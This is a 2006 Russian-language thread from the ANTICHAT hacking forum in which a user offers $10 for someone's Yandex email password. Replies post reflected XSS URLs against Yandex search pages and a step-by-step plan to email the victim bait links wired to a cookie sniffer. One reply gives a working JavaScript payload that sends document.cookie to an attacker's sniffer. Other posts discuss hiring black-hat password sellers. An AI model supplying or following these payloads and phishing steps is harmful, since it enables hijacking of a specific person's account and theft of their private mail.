HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости Mail-сервис
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #21  
Старый 24.06.2006, 22:17
petro
Новичок
Регистрация: 24.06.2006
Сообщений: 2
Провел на форуме:
4033

Репутация: 0
По умолчанию

одни разговоры...
один виртуал...
здесь вообще есть реальные профессионалы или ламеры все???
мне нужно получить текущий пароль от yandex email готов выложить не много - 10 долл. Конечно это не много, но все же деньги.
 
Ответить с цитированием

  #22  
Старый 25.06.2006, 00:58
nc.STRIEM
Members of Antichat - Level 5
Регистрация: 05.04.2006
Сообщений: 1,066
Провел на форуме:
3493315

Репутация: 1228


Отправить сообщение для nc.STRIEM с помощью ICQ
По умолчанию

если ящик заброшеный, то шансы его взломать сводяться практически к нулю!!! т.к. если там стоит пароль случайно сгенирированый, в несколько регистров то брут такого ящика может занять не 1 год...
 
Ответить с цитированием

  #23  
Старый 25.06.2006, 13:07
petro
Новичок
Регистрация: 24.06.2006
Сообщений: 2
Провел на форуме:
4033

Репутация: 0
По умолчанию

Ящиком пользуется какждый день.
Пользователь кое что соображает в безопасности.

Помогите , ящик очень нужен!!!
 
Ответить с цитированием

  #24  
Старый 25.06.2006, 15:30
LoneWolf666
Постоянный
Регистрация: 09.12.2005
Сообщений: 377
Провел на форуме:
2046072

Репутация: 362
По умолчанию

Помогают только друзьям и тем кто помощь заслужил... С остальными только торгово-рыночные отношения.
 
Ответить с цитированием

  #25  
Старый 25.06.2006, 23:52
KoTeG
Banned
Регистрация: 29.04.2006
Сообщений: 452
Провел на форуме:
1031230

Репутация: 266
По умолчанию

Слушайте хватит парня унижать он вам как будто 10 $ не предложил , я вот понимаю его денег не особо нету так как он не особо во всем этом понимает!
 
Ответить с цитированием

  #26  
Старый 26.06.2006, 11:10
m2infect
Познающий
Регистрация: 20.06.2006
Сообщений: 34
Провел на форуме:
140396

Репутация: 5
Post

Цитата:
Сообщение от LoneWolf666  
Помогают только друзьям и тем кто помощь заслужил... С остальными только торгово-рыночные отношения.
Полностью поддерживаю.

Касательно торгово-рыночных отношений.
Торговаться как на базаре, и говорить что нету денег - помоему это не совсем этично. Нету денег - нету работы, справедливо и обратное. Почему именно так, а не как-нить иначе?, я думаю что не нужно объяснять. Работа есть работа, какой бы она не была. Почему человек должен тратить своё время на пользователя, чтоб удовлетворить его желание и прислать ему на почту пароль.

Нужно уважать труд других.

Я ни кого не хотел обидеть. И думаю что меня многие поддержат.
 
Ответить с цитированием

  #27  
Старый 26.06.2006, 19:41
Dronga
ВАША реклама ТУТ!!
Регистрация: 01.07.2005
Сообщений: 647
Провел на форуме:
3478464

Репутация: 714


Отправить сообщение для Dronga с помощью ICQ
По умолчанию

Я фигею, форум по уязвимостям веб-интерфейсов, а мы обсуждаем СИ и впаривание троя... Брут ещё хоть каким-то боком можно к теме приписать. Очень радует активность новоиспеченных мудераторов раздела, со всех бы снял модерство, оставил только Майора, реально знающий человек, просто тема видать под его взор ещё не попала, ему простительно.

Поехали дальше. Все забыли про XSS.

Yandex.RU - Internet Explorer
_http://www.yandex.ru/yandsearch?text=gLAnce_was_here&stype="><script>al ert('found_by_gLAnce')</script>
_http://images.yandex.ru/yandsearch?rpt="><script>alert('found_by_gLAnce')</script>&text=xaxa
_http://news.yandex.ru/yandsearch?rpt=nnews2&grhow=clutop&text=sasa&doSea rch="><script>alert('found')</script>


Неужели их так трудно найти??? Ребята, это паблик античата.

Далее идём на страничку http://antichat.ru/sniff/ и прикручиваем сниффер. Тестим на себе. Если всё ОК, то после этого начинаем бомбить человека письмами с этими линками и душещипательными просьбами кликнуть по ним. Если нет - в ПМ к модерам раздела за помощью, не надо создавать тем вида "Почему не приходят куки". Если метод прокатил - поздравляю.

Этот вариант, что называется, от безысходности.

Если есть голова и время, то смело могу сказать, что на яндексе есть активная XSS прямо в теле письма, ищите =) Тот кто ищет и верит... Это, конечно, вариант "Люкс" =) И это уже мой приват для античата =) + мультибраузерная.

Напоследок, могу также уверенно заявить, что на сегодня есть на античате люди, которые могут реально предоставить пароль от желаемого ящика, только цвет ника у этих людей точно не белый. Советую быть осторожным при выборе исполнителя и выбирать тех, кто уже себя зарекомендовал на античате. Опять-таки, не факт, что они это делают для кого попало.

Вроде исчерпывающе.
__________________
My ICQ: 296@463@859 ONLY!! Please check your list!!
И здесь могла бы быть ВАША реклама!!!

Последний раз редактировалось Dronga; 27.06.2006 в 13:30..
 
Ответить с цитированием

  #28  
Старый 26.06.2006, 22:41
Zadoxlik
Постоянный
Регистрация: 28.02.2005
Сообщений: 853
Провел на форуме:
3369632

Репутация: 749


По умолчанию

Dronga, цвет ника это не показатель. Лучше работать через гаранта, но это в том случае если исполнитель не согласен дать ящик вперед. Если согласен, то тут вообще без вариантов.
 
Ответить с цитированием

  #29  
Старый 27.06.2006, 10:48
m2infect
Познающий
Регистрация: 20.06.2006
Сообщений: 34
Провел на форуме:
140396

Репутация: 5
По умолчанию

to Dronga.
Ответ исчпыващий. Спасибо.

Это-то просто. Нашел кучу сайтов с такой же ошибкой. Но как ею пользоваться? Я понял что в алерт нужно вставлять ссылку на сниф
Таких ошибок я нашел много'><script>alert(document.
cookie)</script> тем более это можно на каждом заборе прочитать. Только как пользоваться - как "прикрутить" туда сниф, так я и не понял. Ссылку на сниф просто так не вставить.


Но все же большое спасибо.

Последний раз редактировалось m2infect; 27.06.2006 в 10:55..
 
Ответить с цитированием

  #30  
Старый 27.06.2006, 11:07
.Slip
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме:
21768337

Репутация: 3486


По умолчанию

Цитата:
Ссылку на сниф просто так не вставить.
Отчего же не вставить?
Вместо:
Цитата:
<script>alert(document.
cookie)</script>
Ставишь:
Цитата:
<script>img = new Image(); img.src = "твой сниффер?"+document.cookie;</script>
И всё. Сниффер можно на сайте античата зерегистрировать.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Взлом почтового ящика на mail.ru Twinkles-hak Уязвимости Mail-сервис 103 03.02.2004 10:40



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ